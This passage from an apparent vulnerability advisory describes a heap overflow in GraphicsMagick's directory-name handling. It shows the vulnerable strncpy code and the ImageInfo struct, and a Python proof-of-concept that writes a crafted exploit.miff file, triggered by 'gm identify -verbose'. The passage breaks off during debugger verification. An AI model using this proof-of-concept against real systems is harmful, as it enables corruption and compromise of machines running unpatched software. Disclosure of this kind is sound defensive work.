class=\"crayon-t\">void<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">CloneString<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-o\">&amp;<\/span><span class=\"crayon-v\">image_info<\/span><span class=\"crayon-o\">-&gt;<\/span><span class=\"crayon-v\">size<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-s\">&#8220;64&#215;64&#8221;<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-59f8f774244bc287208740-6\"><span class=\"crayon-cn\">849<\/span><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-t\">void<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">fprintf<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">file<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-s\">&#8221;&nbsp;&nbsp;Directory:n&#8221;<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-59f8f774244bc287208740-7\"><span class=\"crayon-cn\">850<\/span><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; <\/span><span class=\"crayon-st\">for<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">p<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-v\">image<\/span><span class=\"crayon-o\">-&gt;<\/span><span class=\"crayon-v\">directory<\/span><span class=\"crayon-sy\">;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">*<\/span><span class=\"crayon-v\">p<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">!=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8216;\u0000&#8217;<\/span><span class=\"crayon-sy\">;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">p<\/span><span class=\"crayon-o\">++<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-59f8f774244bc287208740-8\"><span class=\"crayon-cn\">851<\/span><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; <\/span><span class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-59f8f774244bc287208740-9\"><span class=\"crayon-cn\">852<\/span><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; <\/span><span class=\"crayon-v\">q<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-v\">p<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-59f8f774244bc287208740-10\"><span class=\"crayon-cn\">853<\/span><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; <\/span><span class=\"crayon-st\">while<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-o\">*<\/span><span class=\"crayon-v\">q<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">!=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8216;n&#8217;<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&amp;&amp;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-o\">*<\/span><span class=\"crayon-v\">q<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">!=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8216;\u0000&#8217;<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-59f8f774244bc287208740-11\"><span class=\"crayon-cn\">854<\/span><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; <\/span><span class=\"crayon-v\">q<\/span><span class=\"crayon-o\">++<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-59f8f774244bc287208740-12\"><span class=\"crayon-cn\">855<\/span><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-t\">void<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">strncpy<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">image_info<\/span><span class=\"crayon-o\">-&gt;<\/span><span class=\"crayon-v\">filename<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-v\">p<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-v\">q<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">p<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-59f8f774244bc287208740-13\"><span class=\"crayon-cn\">856<\/span><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; <\/span><span class=\"crayon-v\">image_info<\/span><span class=\"crayon-o\">-&gt;<\/span><span class=\"crayon-v\">filename<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-v\">q<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">p<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-s\">&#8216;\u0000&#8217;<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-59f8f774244bc287208740-14\"><span class=\"crayon-cn\">857<\/span><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; <\/span><span class=\"crayon-v\">p<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-v\">q<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-59f8f774244bc287208740-15\"><span class=\"crayon-sy\">.<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-sy\">.<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-59f8f774244bc287208740-16\"><span class=\"crayon-cn\">880<\/span><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; <\/span><span class=\"crayon-sy\">}<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-59f8f774244bc287208740-17\"><span class=\"crayon-cn\">881<\/span><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; <\/span><span class=\"crayon-e\">DestroyImageInfo<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">image_info<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<\/div>\n<\/td>\n<\/tr>\n<\/table><\/div>\n<\/p><\/div>\n<p>  <!-- [Format Time: 0.0023 seconds] -->  <\/p>\n<p>Since the field <code>filename<\/code> in the <code>ImageInfo<\/code> struct has the static size of 2053, the heap can be corrupted by forging an overly long directory name.<\/p>\n<\/p>\n<p><!-- Crayon Syntax Highlighter v_2.7.2_beta -->    \t\t<\/p>\n<div id=\"crayon-59f8f774244bf963080980\" class=\"crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-toolbar\" data-settings=\" mouseover overlay hide delay\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-title\"><\/span>  \t\t\t<\/p>\n<div class=\"crayon-tools\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\">\n<div class=\"crayon-button crayon-nums-button\" title=\"Toggle Line Numbers\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-plain-button\" title=\"Toggle Plain Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-wrap-button\" title=\"Toggle Line Wrap\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-expand-button\" title=\"Expand Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-copy-button\" title=\"Copy\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-popup-button\" title=\"Open Code In New Window\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<p><span class=\"crayon-language\">C<\/span><\/div>\n<\/div>\n<div class=\"crayon-info\" style=\"min-height: 16.8px !important; line-height: 16.8px !important;\"><\/div>\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\"> type = struct _ImageInfo {  &#8230;      FILE *file;      char magick[2053];      char filename[2053];      _CacheInfoPtr_ cache;      void *definitions;      Image *attributes;      unsigned int ping;      PreviewType preview_type;      unsigned int affirm;      _BlobInfoPtr_ blob;      size_t length;      char unique[2053];      char zero[2053];      unsigned long signature;  }<\/textarea><\/div>\n<div class=\"crayon-main\" style=\"\">\n<table class=\"crayon-table\">\n<tr class=\"crayon-row\">\n<td class=\"crayon-nums\" data-settings=\"show\">\n<div class=\"crayon-nums-content\" style=\"font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-num\" data-line=\"crayon-59f8f774244bf963080980-1\">1<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-59f8f774244bf963080980-2\">2<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-59f8f774244bf963080980-3\">3<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-59f8f774244bf963080980-4\">4<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-59f8f774244bf963080980-5\">5<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-59f8f774244bf963080980-6\">6<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-59f8f774244bf963080980-7\">7<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-59f8f774244bf963080980-8\">8<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-59f8f774244bf963080980-9\">9<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-59f8f774244bf963080980-10\">10<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-59f8f774244bf963080980-11\">11<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-59f8f774244bf963080980-12\">12<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-59f8f774244bf963080980-13\">13<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-59f8f774244bf963080980-14\">14<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-59f8f774244bf963080980-15\">15<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-59f8f774244bf963080980-16\">16<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-59f8f774244bf963080980-17\">17<\/div>\n<\/div>\n<\/td>\n<td class=\"crayon-code\">\n<div class=\"crayon-pre\" style=\"font-size: 12px !important; line-height: 15px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;\">\n<div class=\"crayon-line\" id=\"crayon-59f8f774244bf963080980-1\"><span class=\"crayon-v\">type<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-t\">struct<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">_ImageInfo<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-59f8f774244bf963080980-2\"><span class=\"crayon-sy\">.<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-sy\">.<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-59f8f774244bf963080980-3\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">FILE<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">*<\/span><span class=\"crayon-v\">file<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-59f8f774244bf963080980-4\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-t\">char<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">magick<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-cn\">2053<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-59f8f774244bf963080980-5\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-t\">char<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">filename<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-cn\">2053<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-59f8f774244bf963080980-6\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-e\">_CacheInfoPtr_ <\/span><span class=\"crayon-v\">cache<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-59f8f774244bf963080980-7\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-t\">void<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">*<\/span><span class=\"crayon-v\">definitions<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-59f8f774244bf963080980-8\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">Image<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">*<\/span><span class=\"crayon-v\">attributes<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-59f8f774244bf963080980-9\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-t\">unsigned<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-t\">int<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">ping<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-59f8f774244bf963080980-10\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-e\">PreviewType <\/span><span class=\"crayon-v\">preview_type<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-59f8f774244bf963080980-11\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-t\">unsigned<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-t\">int<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">affirm<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-59f8f774244bf963080980-12\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-e\">_BlobInfoPtr_ <\/span><span class=\"crayon-v\">blob<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-59f8f774244bf963080980-13\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-e\">size_t <\/span><span class=\"crayon-v\">length<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-59f8f774244bf963080980-14\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-t\">char<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">unique<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-cn\">2053<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-59f8f774244bf963080980-15\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-t\">char<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">zero<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-cn\">2053<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-59f8f774244bf963080980-16\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-t\">unsigned<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-t\">long<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">signature<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-59f8f774244bf963080980-17\"><span class=\"crayon-sy\">}<\/span><\/div>\n<\/div>\n<\/td>\n<\/tr>\n<\/table><\/div>\n<\/p><\/div>\n<p>  <!-- [Format Time: 0.0017 seconds] -->  <\/p>\n<p>One possible way to trigger the vulnerability is to run the <code><em>identify<\/em><\/code> command on a specially crafted MIFF format file with the verbose flag.<\/p>\n<p><u>Proof of Concept<\/u><br \/> The following proof of concept script will generate a specially crafted MIFF file <code>exploit.miff<\/code>.<\/p>\n<\/p>\n<p><!-- Crayon Syntax Highlighter v_2.7.2_beta -->    \t\t<\/p>\n<div id=\"crayon-59f8f774244c2624867613\" class=\"crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-toolbar\" data-settings=\" mouseover overlay hide delay\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-title\"><\/span>  \t\t\t<\/p>\n<div class=\"crayon-tools\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\">\n<div class=\"crayon-button crayon-nums-button\" title=\"Toggle Line Numbers\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-plain-button\" title=\"Toggle Plain Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-wrap-button\" title=\"Toggle Line Wrap\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-expand-button\" title=\"Expand Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-copy-button\" title=\"Copy\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-popup-button\" title=\"Open Code In New Window\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<p><span class=\"crayon-language\">Python<\/span><\/div>\n<\/div>\n<div class=\"crayon-info\" style=\"min-height: 16.8px !important; line-height: 16.8px !important;\"><\/div>\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\"> #!\/usr\/bin\/python    from pwn import *    partitions = (&#8216;id=ImageMagick  version=1.0nclass=DirectClass  matte=Falsen&#8217; +                &#8216;columns=1  rows=1  depth=16nscene=1nmontage=1&#215;1+0+0nx0cn&#8217; +                &#8216;:x1a&#8217;,                &#8216;nx00xbexbexbexbexbexben&#8217;)  output = &#8220;exploit.miff&#8221;    def main():      payload = &#8220;A&#8221;*10000      payload = partitions[0] + payload + partitions[1]      file(output, &#8220;w&#8221;).write(payload)    if __name__ == &#8220;__main__&#8221;:      main()<\/textarea><\/div>\n<div class=\"crayon-main\" style=\"\">\n<table class=\"crayon-table\">\n<tr class=\"crayon-row\">\n<td class=\"crayon-nums\" data-settings=\"show\">\n<div class=\"crayon-nums-content\" style=\"font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-num\" data-line=\"crayon-59f8f774244c2624867613-1\">1<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-59f8f774244c2624867613-2\">2<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-59f8f774244c2624867613-3\">3<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-59f8f774244c2624867613-4\">4<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-59f8f774244c2624867613-5\">5<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-59f8f774244c2624867613-6\">6<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-59f8f774244c2624867613-7\">7<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-59f8f774244c2624867613-8\">8<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-59f8f774244c2624867613-9\">9<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-59f8f774244c2624867613-10\">10<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-59f8f774244c2624867613-11\">11<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-59f8f774244c2624867613-12\">12<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-59f8f774244c2624867613-13\">13<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-59f8f774244c2624867613-14\">14<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-59f8f774244c2624867613-15\">15<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-59f8f774244c2624867613-16\">16<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-59f8f774244c2624867613-17\">17<\/div>\n<\/div>\n<\/td>\n<td class=\"crayon-code\">\n<div class=\"crayon-pre\" style=\"font-size: 12px !important; line-height: 15px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;\">\n<div class=\"crayon-line\" id=\"crayon-59f8f774244c2624867613-1\"><span class=\"crayon-c\">#!\/usr\/bin\/python<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-59f8f774244c2624867613-2\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-59f8f774244c2624867613-3\"><span class=\"crayon-st\">from<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">pwn <\/span><span class=\"crayon-r\">import<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">*<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-59f8f774244c2624867613-4\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-59f8f774244c2624867613-5\"><span class=\"crayon-v\">partitions<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8216;id=ImageMagick&nbsp;&nbsp;version=1.0nclass=DirectClass&nbsp;&nbsp;matte=Falsen&#8217;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-59f8f774244c2624867613-6\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-s\">&#8216;columns=1&nbsp;&nbsp;rows=1&nbsp;&nbsp;depth=16nscene=1nmontage=1&#215;1+0+0nx0cn&#8217;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-59f8f774244c2624867613-7\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-s\">&#8216;:x1a&#8217;<\/span><span class=\"crayon-sy\">,<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-59f8f774244c2624867613-8\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-s\">&#8216;nx00xbexbexbexbexbexben&#8217;<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-59f8f774244c2624867613-9\"><span class=\"crayon-v\">output<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;exploit.miff&#8221;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-59f8f774244c2624867613-10\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-59f8f774244c2624867613-11\"><span class=\"crayon-r\">def<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">main<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-59f8f774244c2624867613-12\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">payload<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;A&#8221;<\/span><span class=\"crayon-o\">*<\/span><span class=\"crayon-cn\">10000<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-59f8f774244c2624867613-13\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">payload<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">partitions<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">payload<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">partitions<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-cn\">1<\/span><span class=\"crayon-sy\">]<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-59f8f774244c2624867613-14\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-k\">file<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">output<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;w&#8221;<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">write<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">payload<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-59f8f774244c2624867613-15\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-59f8f774244c2624867613-16\"><span class=\"crayon-st\">if<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">__name__<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">==<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;__main__&#8221;<\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-59f8f774244c2624867613-17\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-e\">main<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<\/div>\n<\/td>\n<\/tr>\n<\/table><\/div>\n<\/p><\/div>\n<p>  <!-- [Format Time: 0.0018 seconds] -->  <\/p>\n<p>Running the GraphicsMagick <code>gm<\/code> utility with the arguments <code>identify -verbose<\/code> in GDB and breaking after the vulnerable <code>strncpy<\/code> call, and examining the corrupted <code>ImageInfo<\/code> object demonstrates that the heap corruption was successful.<\/p>\n<\/p>\n<p><!-- Crayon Syntax Highlighter v_2.7.2_beta -->    